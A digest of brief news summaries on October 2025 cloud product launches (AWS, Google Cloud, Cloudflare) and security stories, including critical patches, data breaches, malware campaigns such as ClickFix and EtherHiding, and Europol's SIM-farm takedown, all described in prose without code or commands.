Cloud Controls Roll Out Amid High-Severity Patches and Active Threats

BigQuery Studio updated with streamlined console UI

🔧 BigQuery Studio unveils a simplified, organized console interface designed to help data analysts, engineers, and scientists work more efficiently. The update introduces an expanded Explorer view for easier resource discovery, a context-aware Reference panel that surfaces table schemas and lets you insert query snippets, and a decluttered layout including a dedicated Job history tab. These changes reduce context switching and tab proliferation so users can focus on analysis.

Axion C4A and N4 VMs Now GA for Cloud SQL Enterprise

🚀 Google has made Axion-powered C4A and Intel-based N4 virtual machines generally available for Cloud SQL Enterprise Plus and Enterprise editions, promising substantial gains in throughput and price-performance. Hyperdisk Balanced storage is supported on both families to boost I/O, increase throughput, and allow independent configuration of capacity, throughput, and IOPS. Customer tests report lower costs, reduced latency, and large throughput gains. These machines are available in select regions; check Cloud SQL pricing and region documentation for details.

Amazon EC2 Capacity Manager: Centralized Capacity View

📊 Amazon today announced general availability of Amazon EC2 Capacity Manager, a console and API capability that centralizes monitoring, analysis, and management of EC2 capacity across accounts and Regions. The tool provides dashboards and drilldowns for On-Demand, Spot, and Capacity Reservations, historical trends, optimization recommendations, and exportable data for integration. Available in all commercial AWS Regions at no additional cost.

ASP.NET Core Kestrel Flaw Earns 9.9 Severity Score Now

⚠️Microsoft patched a critical ASP.NET Core vulnerability in the built‑in Kestrel web server and assigned it a CVSS score of 9.9, the highest rating the vendor has ever issued. Tracked as CVE-2025-55315, the flaw enables authenticated attackers to use HTTP request smuggling to bypass security checks and could allow actions such as logging in as another user, bypassing CSRF protections, or performing injection attacks. Microsoft advises updating affected runtimes or rebuilding and redeploying self‑contained apps, while noting that reverse proxies or gateways may already mitigate exposure.

Monitor Groups for Load Balancing: Multi-Service Health

🔍 Cloudflare introduces Monitor Groups for Load Balancing to assess application health across multiple dependent services rather than relying on a single probe. You can bundle up to five monitors, mark some as must_be_healthy (critical) or as monitoring_only (observational), and apply a quorum rule so transient failures don’t trigger global failover. Health checks run from dozens to hundreds of global data centers, creating a geographically distributed consensus. Available via API for Enterprise customers now, Dashboard access for all users is coming soon.

ExPRT.AI: Predicting Which Vulnerabilities Will Be Exploited

🔍 ExPRT.AI, embedded in Falcon Exposure Management, leverages CrowdStrike threat intelligence and real-time telemetry to predict which vulnerabilities attackers are most likely to exploit. Instead of relying solely on static CVSS ratings, it evaluates adversary tradecraft, observed exploit activity, software prevalence, patch adoption, and attack complexity to produce a daily exploitability score. These explainable scores feed directly into Falcon workflows to accelerate triage, prioritize fixes by real-world risk, and reduce manual noise in vulnerability management.

Google's 2025 Cybersecurity Initiative: New Protections

🔒 Google is expanding protections during Cybersecurity Awareness Month 2025 with new features and guidance to counter scams and AI-driven threats. The company outlines a cohesive strategy for securing the AI ecosystem and introduces six new anti-scam measures to help users stay safe. It also launches Recovery Contacts to simplify account recovery and debuts CodeMender, an AI agent that automates code security. Additional updates support safer learning through responsible tools and partnerships.

Amazon EC2 C8g Instances Expand to More AWS Regions

🚀 Amazon has made EC2 C8g instances available in AWS Europe (Milan) and AWS Asia Pacific (Hong Kong, Osaka, Melbourne). These Graviton4-powered instances deliver up to 30% better compute performance than Graviton3-based instances and are optimized for compute-intensive workloads such as HPC, batch processing, gaming, video encoding, distributed analytics, CPU-based ML inference, and ad serving. Built on the AWS Nitro System, C8g instances provide larger instance sizes (including bare metal), up to 50 Gbps enhanced networking, and up to 40 Gbps EBS bandwidth to improve both performance and security.

Microsoft fixes highest-severity ASP.NET Core flaw

🔒 Microsoft patched a critical HTTP request smuggling vulnerability (CVE-2025-55315) in the Kestrel ASP.NET Core web server, which Microsoft described as the highest-severity ASP.NET Core flaw ever. An authenticated attacker could smuggle an additional HTTP request to hijack other users' credentials, bypass front-end security controls, or impact integrity and availability. Microsoft released updates for Visual Studio 2022, ASP.NET Core 2.3, 8.0 and 9.0 and advised developers to apply updates, recompile where required, and restart or redeploy affected applications.

Over 266,978 F5 BIG-IP Instances Exposed to Remote Attacks

⚠️ Shadowserver Foundation reports 266,978 internet-exposed F5 BIG-IP instances after F5 disclosed a breach in which nation-state actors stole source code and information on undisclosed BIG-IP flaws. F5 issued patches addressing 44 vulnerabilities and urged immediate updates for BIG-IP, F5OS, BIG-IQ, and related products. CISA issued an emergency directive requiring federal agencies to patch or mitigate affected devices by set deadlines. Nearly half of the detected instances are in the United States, with most others across Europe and Asia.

UK Weighed Destroying Data Hub After Decade-Long Intrusion

🔐 British officials briefly considered physically destroying a government data hub after uncovering a decade-long intrusion attributed to China-aligned actors. The breach reportedly exposed official-sensitive and secret material on government servers, though no top secret data was taken. Rather than demolish the facility, the government implemented alternative protections and commissioned a classified review. Cybersecurity experts say the episode underscores the critical need to secure supply chains and hunt long-term APT presence.

North Korean Actors Abuse Blockchains for Malware Delivery

🛡️ Google Threat Intelligence Group (GTIG) reports that North Korean-linked UNC5342 is using a method called EtherHiding to deliver malware and facilitate cryptocurrency theft by embedding encrypted payloads in smart contracts on Ethereum and BNB Smart Chain. The technique turns immutable contracts into resilient, hard-to-takedown command-and-control infrastructure. Initial lures include fake recruiter messages, poisoned npm packages and malicious GitHub repositories; a JavaScript downloader named JADESNOW fetches and decrypts subsequent backdoors such as INVISIBLEFERRET.

Envoy Air Confirms Oracle E-Business Suite Data Theft

🔒 Envoy Air confirmed that data was compromised from its Oracle E-Business Suite application after the Clop extortion gang listed American Airlines on its leak site. The carrier said it immediately launched an investigation, contacted law enforcement, and determined that no sensitive or customer data were affected, though limited business information and commercial contact details may have been exposed. The incident is tied to an August campaign by Clop, which exploited an E-Business Suite zero‑day (CVE‑2025‑61882) and is now publishing claimed stolen files.

Zero Disco: Fileless Rootkits Target Legacy Cisco Switches

⚠️Threat actors exploited a Cisco SNMP vulnerability (CVE-2025-20352) to achieve remote code execution on legacy IOS XE switches and install custom, largely fileless Linux rootkits that hook into the IOSd memory space, set universal passwords (including one containing 'Disco'), and hide processes and network activity. The rootkits spawn a UDP-based controller to toggle or zero logs, bypass access controls, and reset running-config timestamps to mask changes. Trend Micro also observed spoofed IP/MAC addresses and attempts to combine a retooled Telnet memory-access exploit to deepen persistence.

Prosper Data Breach Exposes Personal Data of 17.6M

🔒 Prosper has confirmed a data breach that may have exposed personal information for approximately 17.6 million customers. The company said unauthorized queries were made against customer and applicant databases and that the activity was shut down and access revoked on September 2. Prosper reported no operational disruptions or evidence of unauthorized account access or fund theft, has notified US law enforcement, and will offer affected customers credit monitoring once the scope is confirmed.

Critical WatchGuard Fireware VPN Bug Allows Pre-Auth RCE

🔒 Researchers disclosed a recently patched critical vulnerability in WatchGuard Fireware (CVE-2025-9242, CVSS 9.3) that can allow unauthenticated attackers to execute arbitrary code via an out-of-bounds write in the iked process. The flaw affects multiple Fireware branches, including 11.10.2 through 11.12.4_Update1 (EOL noted for 11.x), 12.0 through 12.11.3 and 2025.1, and has been fixed across several updates such as 2025.1.1 and 12.11.4. Administrators are urged to apply the vendor updates immediately, limit internet exposure of VPN interfaces, and follow vendor mitigation guidance until patches are deployed.

Tracking HoldingHands Malware Expansion Across Asia

🔍 FortiGuard Labs observed a January 2025 campaign that began with Winos 4.0 infections in Taiwan and evolved into a cross‑regional HoldingHands operation affecting China, Taiwan, Japan, and Malaysia. The actor uses phishing PDFs, cloud-hosted and bespoke domains, and multi-stage loaders that leverage Windows Task Scheduler to evade detection. Shared infrastructure, reused code (including digital signatures and debug paths), and repeated JavaScript download scripts link disparate samples, and Fortinet provides detections, IOCs, and mitigation guidance.

Europol Dismantles International SIM Farm Network; SIMCARTEL

🚨 Europol announced the disruption of a sophisticated cybercrime-as-a-service SIM farm in Operation SIMCARTEL, resulting in seven arrests and 26 searches across multiple countries. Authorities seized 1,200 SIM box devices containing about 40,000 active SIM cards, dismantled five servers and took over two websites, and froze significant cash and cryptocurrency assets. The platform supplied numbers from over 80 countries and is tied to the creation of more than 49 million online accounts used in phishing, smishing, investment fraud and other serious offences.

North Korean Hackers Merge BeaverTail and OtterCookie

🔐 Cisco Talos reports that a North Korean-linked threat cluster has blended features of its BeaverTail and OtterCookie JavaScript malware families, with recent OtterCookie variants adding keylogging, screenshot capture, and clipboard monitoring. The intrusion chain observed involved a trojanized Node.js application called Chessfi and a malicious npm dependency published on August 20, 2025 that executed postinstall hooks to launch multi-stage payloads. Talos tied the activity to the Contagious Interview recruitment scam and highlighted continued modularization and abuse of legitimate open-source packages and public Git hosting to distribute malicious code.

North Korean Hackers Use EtherHiding to Steal Crypto

⚠️ Google Threat Intelligence Group has linked a North Korean threat actor to EtherHiding, a technique that embeds malicious JavaScript inside smart contracts so the blockchain functions as a resilient command-and-control server. Tracked as UNC5342, the actor used EtherHiding within an elaborate social-engineering campaign to deliver JADESNOW and a JavaScript variant of INVISIBLEFERRET, leading to multiple cryptocurrency heists. The campaign targets developers via fake recruiters and deceptive coding tests on Telegram and Discord.

Silver Fox Expands Winos 4.0 Attacks to Japan, Malaysia

🔎 Silver Fox operators have expanded the Winos 4.0 (ValleyRAT) campaign from China and Taiwan to target Japan and Malaysia, and are also deploying a secondary RAT tracked as HoldingHands. The actors use phishing emails with booby‑trapped PDFs, SEO‑poisoned pages and targeted .LNK résumé lures to deliver multiple payloads, including Winos modules and HoldingHands. Observed techniques include DLL sideloading, Task Scheduler recovery abuse, anti‑VM checks and AV termination to maintain persistence and evade detection.

ConnectWise fixes Automate AiTM update attack vulnerability

🔒 ConnectWise released a security update for Automate to fix two vulnerabilities including a critical 9.6-severity flaw (CVE-2025-11492) that can cause agents to use cleartext HTTP, enabling adversary-in-the-middle (AiTM) interception or modification of commands, credentials, and update payloads. A second 8.8-severity issue (CVE-2025-11493) omits integrity verification for update packages, allowing substituted malicious files. Cloud instances are patched to release 2025.9; on-premise administrators are urged to install the update within days.

Europol Dismantles Large SIM-box Service Used for Fraud

🔍 Europol, together with national police units and the Shadowserver Foundation, dismantled an illegal SIM‑box service codenamed SIMCARTEL that rented phone numbers to criminals for creating fraudulent online accounts. The service operated about 1,200 SIM‑box devices with roughly 40,000 active SIM cards and offered numbers tied to individuals in more than 80 countries via seized sites gogetsms.com and apisim.com. Authorities linked the infrastructure to thousands of fraud cases and at least EUR 4.5 million in losses in Austria and EUR 420,000 in Latvia.

Significant Satellite Traffic Found Transmitted Unencrypted

⚠️Researchers used a commercial off-the-shelf satellite dish to perform the most comprehensive public study yet of geostationary satellite communications. They discovered a shockingly large volume of sensitive traffic—critical infrastructure telemetry, internal corporate and government communications, private voice calls and SMS, and consumer Internet streams such as in-flight Wi‑Fi—being broadcast unencrypted. Much of this data can be passively observed by anyone with a few hundred dollars of consumer-grade hardware, and a single transponder's footprint may cover up to 40% of the Earth's surface.

AWS Bedrock Guardrails: Customer-Managed KMS Keys Support

🔐 AWS now supports customer-managed AWS Key Management Service (KMS) keys for Amazon Bedrock Guardrails Automated Reasoning checks. Customers can encrypt policy content and test artifacts with their own keys instead of the default key, retaining control over lifecycle and access. This capability helps regulated organizations meet compliance requirements and is available in all Bedrock Guardrails regions. Refer to AWS documentation and the Bedrock console to get started.

Microsoft Revokes 200+ Fraudulent Code-Signing Certificates

🔒 Microsoft disclosed it revoked more than 200 certificates after a threat actor tracked as Vanilla Tempest used them to fraudulently sign malicious binaries, including fake Microsoft Teams installers that delivered the Oyster backdoor and led to Rhysida ransomware deployments. The activity was detected in late September 2025 and disrupted earlier this month, and Microsoft has updated security solutions to flag the associated signatures. The actor abused SEO poisoning and bogus download domains impersonating Teams to distribute trojanized installers. Users are advised to download software only from verified sources and to avoid suspicious links or ads.

Securing Amazon Bedrock API Keys: Best Practices Guidance

🔐 AWS details practical guidance for implementing and managing Amazon Bedrock API keys, the service-specific credentials that provide bearer-token access to Bedrock. It recommends STS temporary credentials when possible and defines two API key types: short-term (client-generated, auto-expiring) and long-term (IAM-user associated). Protection advice includes using SCPs, iam and bedrock condition keys, and storing long-term keys in secure vaults. Detection and monitoring use CloudTrail, EventBridge rules, and an AWS Config rule, and response steps show CLI commands to deactivate and delete compromised keys.

Moloco and Google Cloud Power AI Vector Search in Retail

🔎 Moloco’s AI-native retail media platform, integrated with Vertex AI Vector Search on Google Cloud, delivers semantic, real-time ad retrieval and personalized recommendations. The joint architecture uses TPUs and GPUs for model training and scoring while vector search runs efficiently on CPUs, enabling outcomes-based bidding at scale. Internal benchmarks report ~10x capacity, up to ~25% lower p95 latency, and a ~4% revenue uplift. The managed service reduces operational overhead and accelerates time-to-value for retailers.

OpenSearch Service Adds Graviton4 EC2 Instance Support

🚀 Amazon OpenSearch Service now supports Graviton4-based EC2 instance families — compute-optimized C8g, general-purpose M8g, and memory-optimized R8g/R8gd — across multiple regions. Graviton4 processors deliver up to 30% better performance compared with Graviton3 and are supported on all OpenSearch versions as well as Elasticsearch 7.9 and 7.10. The change is intended to improve price-performance for compute-, general-, and memory-intensive search and analytics workloads.

Hackers Steal Customer Data from Spanish Retailer Mango

🔒An external marketing service provider detected unauthorized access to customer personal data for the Spanish fashion company Mango. The attackers obtained first name, country, postal code, email address and telephone number for some customers, while last names, bank details and passwords were not accessed. Mango says its own systems remain secure and has notified the Spanish data protection authority (AEPD). Customers are urged to remain vigilant for phishing attempts via email, SMS or phone.

Google Ads Promote Fake Homebrew, LogMeIn, TradingView Sites

🚨 Researchers uncovered a malvertising campaign that uses Google Ads to surface convincing fake Homebrew, LogMeIn, and TradingView download sites targeting macOS developers. The pages prompt victims to copy a curl command into Terminal, but the clipboard often contains a base64-encoded installer that decodes and runs an install.sh payload. That script removes quarantine flags, bypasses Gatekeeper, and delivers infostealers that check for analysis environments before executing. Operators deploy AMOS and Odyssey, which harvest browsers, wallets, and credentials; users are urged not to paste unknown commands into Terminal.

Use Gemini CLI to Deploy Cost-Effective LLM Workloads on GKE

🛠️ Google Cloud demonstrates how the Gemini CLI and GKE Inference Quickstart integrate via the Model Context Protocol (MCP) to streamline selecting, benchmarking, and deploying LLMs on GKE. The post outlines installation steps, example prompts to discover cost and performance trade-offs, and how manifests can be generated for target accelerators. This approach reduces manual tuning and provides data-driven recommendations to optimize cost-per-token while preserving performance.

TikTok Videos Push Infostealers via ClickFix Activation Scams

🔒 Cybercriminals are using TikTok videos disguised as free activation guides for software such as Windows, Adobe, Spotify, and Discord to distribute info‑stealing malware via a ClickFix technique. The videos instruct users to run a short PowerShell command that fetches a script from slmgr.win, which then downloads a variant of Aura Stealer and an additional payload from Cloudflare Pages. Victims should assume credentials are compromised, reset passwords, and avoid running copied commands in shells or terminal windows.

AWS Parallel Computing Service Adds Support for Slurm v25.05

🚀 AWS Parallel Computing Service (PCS) now supports Slurm v25.05, enabling PCS clusters to run the latest Slurm capabilities. The release introduces enhanced multi-cluster sackd configuration so login nodes can manage multiple clusters without requiring sackd reconfiguration or restarts, allowing administrators to preconfigure user access across clusters. It also implements improved requeue behavior that automatically retries failed instance launches during capacity shortages, increasing scheduling resilience and overall cluster reliability.

CloudWatch Database Insights Adds Tag-Based Access Control

🔐 Amazon CloudWatch Database Insights now supports tag-based access control for database-level and per-query metrics powered by RDS Performance Insights. Instance tags defined on RDS and Aurora are now automatically evaluated to authorize Performance Insights metrics, enabling IAM policies to use tag-based access conditions across logical groups of databases. This reduces manual, resource-level permission management and improves governance and security consistency. The feature is available in all AWS regions where Database Insights is offered.

Microsoft fixes Windows localhost HTTP/2 connection bug

🔧 Microsoft has fixed a known issue that broke HTTP/2 connections to localhost (127.0.0.1) and caused IIS sites to fail after recent Windows security updates. Affected systems included Windows 11 and Windows Server 2025, producing errors like “ERR_CONNECTION_RESET” and “ERR_HTTP2_PROTOCOL_ERROR”. Microsoft recommends checking Windows Update and restarting; it also enabled a Known Issue Rollback (KIR) for most home and non-managed devices, while enterprise admins can deploy a KIR group policy until a permanent update ships.

Cyberattack Disrupts Hohen Neuendorf City Administration

🔒 The Hohen Neuendorf city administration reported a cyberattack detected on October 7 that forced an immediate shutdown of its IT systems and left municipal operations running in a limited capacity. Contracted cybersecurity experts found indications attackers temporarily accessed and encrypted parts of the city's data holdings, preventing immediate inspection. Authorities say it cannot yet be confirmed whether personal data were stolen and that the city will notify affected individuals under GDPR if a data outflow is verified. Preliminary investigation points to security gaps at an external IT service provider that allegedly failed to report vulnerabilities as contractually required.

AWS Systems Manager: Windows Security Update Alerts

🛡️ AWS Systems Manager Patch Manager now notifies when Windows security updates are available but not approved by a customer's patch baseline. The feature adds a new patch state, AvailableSecurityUpdate, and by default surfaces these instances as Non-Compliant, helping administrators spot missing security patches even when using long ApprovalDelay windows. Organizations can preserve existing reporting by configuring patch baseline behavior. The capability is available in all Regions and incurs no additional charges; administrators can enable it from the Patch Manager console or documentation.

Germany Is the EU's Top Target for Cyberattacks in 2025

🔒 The Microsoft Digital Defense Report 2025 finds Germany was the most targeted EU country in the first half of 2025, receiving 3.3% of global cyberattacks. Attackers are driven more by profit than espionage, with ransomware used in 52% of incidents and pure espionage accounting for 4%. The report highlights threats linked to Russia, China, North Korea and Iran and recommends MFA—which can block 99.9% of credential-based attacks.

New .NET CAPI Backdoor Targets Russian Auto and E-commerce

🔒 Seqrite Labs uncovered a new .NET implant named CAPI Backdoor linked to a phishing campaign targeting Russian automobile and e-commerce organizations. The attack leverages a ZIP archive containing a decoy Russian tax notice and a Windows LNK that loads a malicious adobe.dll via the legitimate rundll32.exe. The backdoor gathers system and browser data, takes screenshots, and communicates with a remote C2 for commands and exfiltration. Persistence is achieved through scheduled tasks and a Startup LNK.

Mandiant Academy: Practical Network Enrichment Course

🛡️ Mandiant Academy and Google Cloud introduce Protecting the Perimeter: Practical Network Enrichment, a short-form training track to sharpen network traffic analysis and CTI operationalization. The curriculum covers five core methodologies—PCAP, netflow, protocol analysis, behavioral baselining, and historical review—and demonstrates how to enrich each with CTI and analytical tradecraft. It is aimed at practitioners who need focused, time-efficient skills to improve detection and investigation.

Preparing for AI, Quantum and Other Emerging Risks

🔐 Cybersecurity must evolve to meet rapid advances in agentic AI, quantum computing, low-code platforms and proliferating IoT endpoints. The author argues organizations should move from static defenses to adaptive, platform-based security that uses automation, continuous monitoring and AI-native protection to match attackers' speed. He urges early planning for post-quantum cryptography and closer collaboration with partners so security enables — rather than hinders — innovation.

CISOs Urged to Accelerate Post-Quantum Cryptography Plans

🔐 Enterprises acknowledge that quantum computing threatens current public-key cryptography, yet progress toward post-quantum cryptography (PQC) is uneven and slow. A PwC report finds fewer than 10% prioritize PQC in budgets, only 3% have fully implemented leading measures, 29% are piloting, and 49% have not started. Financial services, government, telecom and cloud are moving faster, while manufacturing, healthcare and industrial sectors lag due to legacy systems, skills shortages, and standards uncertainty. Experts advise inventories, pilot programs, crypto agility, and investment before the 2030 deprecation deadline to avoid 'harvest now, decrypt later' risks.

Security Teams Must Deploy Anti-Infostealer Defenses Now

🔒 Infostealers are fuelling today’s ransomware wave and the resulting stealer logs are widely available on the dark web, sometimes for as little as $10. At ISACA Europe 2025, Tony Gee of 3B Data Security urged security teams to adopt targeted technical controls in addition to baseline measures like zero trust and network segmentation. He recommended six practical defenses — including regular password rotation, FIDO2-enabled MFA, forced authentication, shorter session tokens, cookie replay detection and impossible-travel monitoring — to reduce the usefulness of stolen credentials and session data.

Experian Netherlands fined €2.7M for unlawful data use

🔍 Experian Netherlands was fined EUR 2.7 million by the Dutch Data Protection Authority for collecting and using personal data from multiple public and private sources without properly informing individuals or obtaining consent. The AP found the company aggregated information from the Chamber of Commerce, telecom and energy firms to produce credit assessments that affected interest rates and upfront deposits. Experian acknowledged the violations, will not appeal, has ceased operations in the Netherlands, and pledged to delete its database of personal data before year-end.

Identity Security: Your First and Last Line of Defense

⚠️ Enterprises now face a reality where autonomous AI agents run with system privileges, executing code and accessing sensitive data without human oversight. Fewer than 4 in 10 AI agents are governed by identity security policies, creating serious visibility and control gaps. Mature identity programs that use AI-driven identity controls and real-time data sync deliver stronger ROI, reduced risk, and operational efficiency. CISOs must move IAM from compliance checkbox to strategic enabler.

Microsoft Removes Additional Safeguard Holds for Windows 11

✅ Microsoft removed two safeguard holds blocking Windows 11 24H2 installs. The April hold affecting systems using SenseShield's sprotect.sys driver—which could trigger BSODs—was lifted after a security.sys driver update; the feature update will be offered within 48 hours. The September 2024 hold for wallpaper customization apps that caused display and virtual-desktop issues was removed on October 15, 2025; affected devices may see a warning and must confirm before upgrading. Microsoft advises updating or uninstalling problematic apps or contacting their developers for support.

Generative AI and Agentic Threats in Phishing Defense

🔒 Generative AI and agentic systems are transforming phishing and smishing into precise, multilingual, and adaptive threats. What were once rudimentary scams now leverage large language models, voice cloning, and autonomous agents to craft personalized attacks at scale. For CISOs and security teams this represents a strategic inflection point that demands updated detection, user education, and cross-functional incident response.

Email-bombing Abuse Exploits Lax Zendesk Authentication

📧 Cybercriminals abused a lack of authentication in the customer-service platform Zendesk to trigger mass ticket-creation notifications that appeared to come from hundreds of legitimate customer domains. KrebsOnSecurity received thousands of messages in rapid succession from brands including The Washington Post, Discord, NordVPN and more, with subjects ranging from alleged law-enforcement warnings to insults. Because some customers allow anonymous ticket creation and enable auto-responder triggers, replies and notifications were sent from those customers' domains, amplifying brand and inbox impact. Zendesk says it is investigating and recommends customers require verified ticket submission.

OpenAI Confirms GPT-6 Not Shipping in 2025; GPT-5 May Evolve

🤖 OpenAI says GPT-6 will not ship in 2025 but continues to iterate on its existing models. The company currently defaults to GPT-5 Auto, which dynamically routes queries between more deliberative reasoning models and the faster GPT-5-instant variant. OpenAI has issued multiple updates to GPT-5 since launch. After viral analyst claims that GPT-6 would arrive by year-end, a pseudonymous OpenAI employee and company representatives denied those reports, leaving room for interim updates such as a potential GPT-5.5.

Three Dutch Teens Linked to Russian-Associated Hackers

🧑‍💻 Three 17-year-olds in the Netherlands are suspected of providing services to a foreign power after one was found communicating with an unnamed Russian-government-affiliated hacking group. Prosecutors say the linked suspect directed the others to repeatedly map Wi‑Fi networks in The Hague and then sold the collected data to the client's contact for a fee. The investigation, opened after a report from the Military Intelligence and Security Service, led to two arrests on 22 September and seizure of devices from a third minor. An updated Criminal Code effective 15 May 2025 now criminalizes digital espionage, carrying up to eight years' imprisonment (or up to 12 years in the most serious cases).

Fortinet Advances Global Cyber Resilience at AMC25

🔒 Fortinet participated in the World Economic Forum’s Annual Meeting on Cybersecurity (AMC25) in Dubai, engaging government, industry, and civil leaders to advance global cyber resilience. Fortinet executives Dr. Carl Windsor and Derek Manky led sessions on public‑private collaboration, frameworks for scaling disruption, and the role of the Cybercrime Atlas in enabling coordinated action. They highlighted recent coordinated operations and impact reported in the 2025 Cybercrime Atlas: Impact Report, emphasizing that aligning policy, governance, and technical intelligence is essential to protect supply chains, AI systems, and critical infrastructure.

Hidden SEO Links: Business Risks and How to Protect

🔍 Hidden blocks of links embedded on corporate websites can quietly erode search rankings and damage reputation by pointing to dubious domains such as pornography or gambling. Invisible to users but parsed by search engines and security tools, these links divert link equity and often trigger algorithmic penalties. Attackers inject them via compromised admin credentials, vulnerable CMS components, infected templates, or breached hosting. Regular updates, strict access controls, routine audits, backups, and mandatory 2FA help prevent and limit impact.

VMware Certification and VMUG Advantage: Career Power Move

🔑 VMware certification is presented as a repeatable framework for mastering complex infrastructure and advancing careers, and VMUG Advantage is offered as an accelerator for that journey. The piece, authored by VMUG leadership, highlights survey data from Pearson VUE showing certification-driven promotions and confidence gains. It outlines tangible member benefits—discounts on training and exams, personal-use licenses, on-demand labs, and global community mentorship—and positions certification as a strategic investment for individuals and teams seeking secure, scalable IT practices.